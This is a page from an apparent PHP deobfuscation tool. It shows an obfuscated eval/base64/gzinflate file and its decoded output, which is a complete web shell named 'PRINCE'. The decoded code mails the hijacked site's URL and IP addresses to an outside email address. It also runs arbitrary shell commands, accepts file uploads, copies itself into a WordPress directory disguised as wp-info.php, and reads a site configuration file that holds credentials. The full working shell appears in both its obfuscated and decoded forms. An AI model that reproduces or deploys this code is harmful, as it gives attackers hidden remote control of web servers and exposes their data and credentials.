Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode("rVfrT9tIEP9cJP6HYZvWiY48AF3FmZi2CuEaqSRcEu4LIMuxN8k..

Decoded Output download

<?php ?><html><head>
<link rel="SHORTCUT ICON" href="https://flagspot.net/images/r/ro%29.gif">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
	position:absolute;
	left:200px;
	top:3px;
	width:800px;
	height:633px;
	z-index:1;
	margin-top: 3%;
	margin-right: 3%;
	right: 20%;
	bottom: auto;
	margin-bottom: 3%;
	margin-left: 3%;
	border: thin solid #0066CC;
	font-family:"Courier New", Courier, monospace;
	overflow: auto;
}
.style1 {
	color: #0000CC;
	font-weight: bold;
}
-->
</style>

<body>
<div id="Layer1"><br><br><table width="100%" border="0">
  <tr>
    <td><div align="center" class="style1"><blink>P R I N C E </blink></div></td>
  </tr>
</table>

  <table width="100%" border="0" cellspacing="20">
    <tr>
      <td><?
@ini_restore("disable_functions");
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Shell Injector 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$df='ini_get  disable!';
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Shell Result http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>P R I N C E</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get  disable!';
if((@function_exists('ini_get')) && (''==([email protected]_get('disable_functions')))){echo "NONE";}else{echo "$df";}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

if(isset($_GET['baca'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
?><?

Did this file decode correctly?

Original Code

<?php

eval(gzinflate(base64_decode("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")));

?>

Function Calls

base64_decode 1
gzinflate 1

Variables

None

Stats

MD5 7825546e0fbf809e8d1711d7e929dedd
Eval Count 1
Decode Time 100 ms